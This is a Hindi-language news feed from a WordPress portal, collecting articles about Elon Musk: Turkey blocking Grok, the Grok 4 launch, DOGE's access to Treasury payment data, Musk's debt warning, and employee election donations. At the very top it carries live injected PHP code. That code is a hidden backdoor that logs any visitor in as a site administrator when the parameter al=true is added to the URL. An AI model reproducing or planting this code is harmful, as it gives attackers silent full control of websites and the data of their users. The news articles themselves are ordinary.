// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Musk – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 10 Jul 2025 04:26:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 एलॉन मस्क को बड़ा झटका: इस देश में Grok AI हुआ बैन https://pratyushaashakinayikiran.com/?p=169370 Thu, 10 Jul 2025 04:26:00 +0000 https://pratyushaashakinayikiran.com/?p=169370 नई दिल्ली 

तुर्की ने एलॉन मस्क के AI चैटबॉट Grok को ब्लॉक कर दिया है. कोर्ट के आदेश के बाद तुर्की में इस चैटबॉट को ब्लॉक किया गया है, जिसे मस्क की कंपनी xAI ने विकसित किया है.

ChatGPT की वाट लगा देगा मस्क का Grok 4? इस दिन होगा लॉन्च

एलन मस्क एक बार फिर चर्चा में हैं, इस बार अपने नए AI मॉडल Grok 4 के लॉन्च को लेकर सुर्खियों में हैं. मस्क की AI कंपनी xAI ने इस पावरफुल चैटबॉट को तैयार किया है, जो सीधे तौर पर ChatGPT को टक्कर देने वाला माना जा रहा है. अब सवाल ये है कि क्या सच में Grok 4, OpenAI के सबसे पॉपुलर मॉडल को पीछे छोड़ देगा? एलन मस्क के ने अपनी एक्स पोस्ट में ग्रोक 4 की लॉन्च डेट कंफर्म कर दी है. यहां जानें Grok 4 क्या है, इसमें क्या खास है और इसका लॉन्च कब होने वाला है.

Grok 4 क्या है?

Grok 4, एलन मस्क की कंपनी xAI का नया AI मॉडल है. ये एक एडवांस चैटबॉट है जो सवालों के जवाब देने, कोडिंग में मदद करने और सवाल-जवाब दे सकता है.

एलन मस्क ने इसे इस तरह डिजाइन करवाया है कि ये बिना किसी राजनीतिक रुकावट के, क्लीयर और बेबाक तरीके से जवाब दे सकता है. ये मॉडल खासकर डेवलपर्स, टेक यूजर्स और AI रिसर्चर्स के लिए तैयार किया गया है.

कब होगा Grok 4 का लॉन्च?

एलन मस्क ने खुद ये जानकारी दी है कि Grok 4 का लॉन्च 9 जुलाई 2025 अमेरिकी टाइम के हिसाब से होगा. भारत में ये 10 जुलाई 2025 की सुबह 8:30 बजे लाइव स्ट्रीम के जरिए पेश किया जाएगा. आप इसे X प्लेटफॉर्म पर लाइव स्ट्रीमिंग कर सकते हैं. इसके अलावा आप xAI की वेबसाइट और YouTube पर कुछ चैनलों के जरिए भी देखा जा सकेगा.

Grok 4 में क्या खास है?

Grok 4 अपने पिछले वर्जन से कई मायनों में बेहतर हो सकता है. ये कोडिंग एक्सपर्ट है. Grok 4 को खासतौर पर प्रोग्रामिंग और कोडिंग टास्क के लिए ट्रेन किया गया है. ये कोड लिखने, डिबग करने और सिखाने में मदद करेगा. मस्क का दावा है कि ये डीप थिंकिंग में ChatGPT से आगे निकल सकता है.

इस वर्जन को एक नए कोडिंग-फोकस्ड मॉडल पर ट्रेन किया गया है जो डेवलपर्स के लिए ज्यादा यूजफुल साबित होगा. इसमें ड्यूल‑पर्सनैलिटी मोड देखने को मिलेगा. एक मोड funny and sarcastic है, जबकि दूसरा फैक्ट बेस्ड और सीरियस मोड हो सकता है. यूजर अपनी पसंद से स्टाइल चुन सकता है.

Grok 4 और ChatGPT

Grok 4 का लॉन्च AI दुनिया में एक बड़ा मोड़ ला सकता है. एलन मस्क का ये नया मॉडल उन यूजर्स के लिए खास है जो एआई से फास्ट, क्लीयर और टेक्निकल सपोर्ट चाहते हैं.

हालांकि ChatGPT सिंपल, भरोसेमंद जवाब और भाषा के वजह से आज भी लोगों की पहली पसंद बना हुआ है. लेकिन Grok 4 जैसे नए ऑप्शन आने से मुकाबला और भी तगड़ा हो गया है.

 

]]>
मस्क के DOGE आयोग को संवेदनशील वित्तीय भुगतान पर नेताओं ने जताई चिंता, वित्त सचिव को लिखा पत्र https://pratyushaashakinayikiran.com/?p=128109 Sun, 02 Feb 2025 12:55:00 +0000 https://pratyushaashakinayikiran.com/?p=128109 वाशिंगटन।

टेस्ला के सीईओ एलन मस्क द्वारा संचालित सरकारी दक्षता विभाग (DOGE) को सामाजिक सुरक्षा और मेडिकेयर ग्राहक भुगतान प्रणालियों सहित संवेदनशील वित्तीय डेटा तक पहुंच मिल गई है। कई नेताओं ने इस पर गहरी चिंता जाहिर की है।

बता दें कि डोनाल्ड ट्रंप प्रशासन ने सरकारी खर्च को नियंत्रित करने, संघीय कर्मचारियों की छंटनी करने, सरकार के खर्च में कटौती करने और संघीय नियम-कानूनों को कम करने के लिए सरकारी दक्षता विभाग का गठन किया था और इसकी कमान एलन मस्क को सौंपी गई थी।

सीनेट की वित्तीय समिति के प्रमुख ने जताई चिंता
अब मस्क के नेतृत्व वाले सरकारी दक्षता विभाग को संवेदनशील करदाता डेटा तक व्यापक छूट मिल गई है। इसे लेकर सीनेट की वित्तीय समिति के प्रमुख डेमोक्रेट सांसद रॉन विडेन ने इस पर गहरी चिंता जताई है और उन्होंने इस मुद्दे पर वित्त सचिव स्कॉट बेसेंट को पत्र भी लिखा है। पत्र में उन्होंने मस्क और उनकी टास्क फोर्स के सदस्यों की भुगतान प्रणाली तक पहुंच से किसी भी कार्यक्रम में भुगतान को अवैध रूप से रोका जा सकता है। इनमें किसी भी तरह की राजनीतिक दखलअंदाजी हमारे देश की अर्थव्यवस्था को गंभीर नुकसान पहुंचा सकती है।

वित्त विभाग के शीर्ष अधिकारी ने दिया इस्तीफा
उल्लेखनीय है कि यह खबर ऐसे समय आई है, जब वित्त विभाग के कार्यवाहक उप-सचिव डेविड लेब्रिक ने 30 साल की सेवा के बाद हाल ही में अपने पद से इस्तीफा दे दिया था। शुक्रवार को ट्रेजरी कर्मचारियों को भेजे गए पत्र में लेब्रिक ने कहा, 'वित्तीय सेवा सरकार में कुछ सबसे महत्वपूर्ण काम करती है। हमारा काम अधिकांश लोगों के लिए अज्ञात हो सकता है, लेकिन इसका मतलब यह नहीं है कि यह असाधारण रूप से महत्वपूर्ण नहीं है। मैं देश के कुछ सबसे बेहतरीन और सबसे प्रतिभाशाली संचालन कर्मचारियों के साथ काम करने में सक्षम होने के लिए आभारी हूं।' लेब्रिक के इस्तीफे पर प्रतिक्रिया देते हुए मस्क ने सोशल मीडिया पर लिखा कि वित्तीय विभाग के अधिकारियों ने कभी भी किसी भुगतान को मंजूरी देने से इनकार नहीं किया है, फिर चाहे ये धोखाधड़ी या आतंकवाद समूहों के लिए ही क्यों न हो।

]]>
सरकारी खर्चों में कटौती नहीं हुई तो अमेरिका हो जायेगा दिवालिया: मस्क https://pratyushaashakinayikiran.com/?p=88856 Wed, 23 Oct 2024 09:26:00 +0000 https://pratyushaashakinayikiran.com/?p=88856 वाशिंगटन
 अमेरिका के अरबपति उद्यमी एलन मस्क ने चेतावनी दी है कि अगर सरकारी खर्चों में कटौती नहीं की गई तो अमेरिका दिवालिया हो जाएगा।

मस्क ने एक्स पर अमेरिकी सरकार के ऋण पर आसमान छूते ब्याज भुगतान पर टिप्पणी करते हुए कहा, ”अगर सरकारी खर्चों में कटौती नहीं की गई, तो बहुत अधिक कर्ज लेने वाले व्यक्ति की ही तरह अमेरिका भी दिवालिया हो जाएगा। कर्ज पर ब्याज तेजी से सभी कर राजस्व को अवशोषित कर रहा है, जिससे देश के लिए कुछ भी नहीं बचेगा।”

गौरतलब है कि मई में अमेरिकी कांग्रेस के बजट कार्यालय ने एक रिपोर्ट प्रकाशित की थी, जिसके अनुसार अगले 30 वर्षों में देश का राष्ट्रीय ऋण बढ़कर सकल घरेलू उत्पाद का 166 प्रतिशत हो जाएगा, जबकि इस आंकड़े के सकल घरेलू उत्पाद के 250 प्रतिशत तक बढ़ने के जोखिम से इंकार नहीं किया गया था।

आगामी अमेरिकी राष्ट्रपति चुनाव में राष्ट्रीय ऋण सबसे ज्यादा चर्चा में रहने वाले विषयों में से एक है। चुनाव पांच नवंबर को होगा जिसमें डेमोक्रेटिक पार्टी का प्रतिनिधित्व उपराष्ट्रपति कमला हैरिस और रिपब्लिकन पार्टी का प्रतिनिधित्व पूर्व राष्ट्रपति डोनाल्ड ट्रम्प कर रहे हैं।

 

 

]]>
अमेरिका में राष्ट्रपति कोई भी बने,एलन मस्क की रहेगी बल्ले-बल्ले https://pratyushaashakinayikiran.com/?p=72534 Fri, 20 Sep 2024 09:36:00 +0000 https://pratyushaashakinayikiran.com/?p=72534 वाशिंगटन
 टेस्ला, स्पेसएक्स और सोशल मीडिया प्लेटफॉर्म एक्स के मालिक एलन मस्क को नेताओं का नेता कहा जाए तो कोई अतिश्योक्ति नहीं होगी। क्योंकि अमेरिकी राष्ट्रपति चुनाव में उन्होंने एक छोटी सी झलक दिखाई है। जिसकी वजह से मस्क एक बार फिर अमेरिकी राजनीति के केंद्र में आ गए हैं। नवंबर में होने वाले अमेरिकी राष्ट्रपति चुनावों से पहले मस्क के व्यवहार को लेकर नई बहस छिड़ गई है। एक तरफ जहां मस्क ने खुले तौर पर रिपब्लिकन उम्मीदवार डोनाल्ड ट्रम्प का समर्थन किया है, वहीं उनकी कंपनियों के कर्मचारी डेमोक्रेटिक पार्टी की कमला हैरिस को चंदा देने में सबसे आगे हैं। यह विरोधाभासी स्थिति कई सवाल खड़े कर रही है।

मस्क ने एक्स पर एक पोस्ट के जरिए ट्रम्प का समर्थन किया था, जिसमें ट्रम्प ने चुनाव जीतने पर मस्क को गवर्नमेंट एफिशिएंसी कमीशन का प्रमुख बनाने का वादा किया था। यह सब ऐसे समय में हो रहा है जब मस्क पर दक्षिणपंथी झुकाव के आरोप लगते रहे हैं। 2020 के चुनावों में मस्क ने जो बाइडेन का समर्थन किया था, लेकिन हाल ही में उन्होंने खुद को वामपंथी विचारधारा से दूर करते हुए ट्रम्प के साथ अपनी नजदीकियों का प्रदर्शन किया है।विशेषज्ञों का मानना है कि मस्क की कंपनियों के कई कर्मचारी कैलिफ़ोर्निया में रहते हैं, जो डेमोक्रेटिक पार्टी का गढ़ माना जाता है। यह संभव है कि मस्क के कर्मचारी अपनी व्यक्तिगत पसंद के आधार पर कमला हैरिस को समर्थन दे रहे हों। हालांकि, मस्क की व्यक्तिगत राजनीतिक मंशा और उनके कर्मचारियों के व्यवहार के बीच यह विरोधाभास चुनावी माहौल में एक चर्चा का विषय बना हुआ है।

मीडिया रिपोर्ट्स के मुताबिक मस्क की कंपनियों के कर्मचारी डेमोक्रेटिक उम्मीदवार कमला हैरिस के चुनावी अभियान को बड़े पैमाने पर आर्थिक योगदान दे रहे हैं। ओपनसीक्रेट्स लाबिंग और डोनेशन से जुड़े डेटा को इकट्ठा करने का काम करती है। इसके अनुसार, टेस्ला के कर्मचारियों ने हैरिस के राष्ट्रपति अभियान में 42,824 डॉलर का योगदान दिया, जबकि ट्रम्प के अभियान को केवल 24,840 डॉलर मिले। स्पेसएक्स के कर्मचारियों ने भी हैरिस को 34,526 डॉलर दिए, जबकि ट्रम्प को केवल 7,652 डॉलर ही मिले। इसी प्रकार, सोशल मीडिया प्लेटफार्म एक्स के कर्मचारियों ने हैरिस को 13,213 डॉलर का योगदान दिया, जबकि ट्रम्प को मात्र 500 डॉलर प्राप्त हुए।

 

 

]]>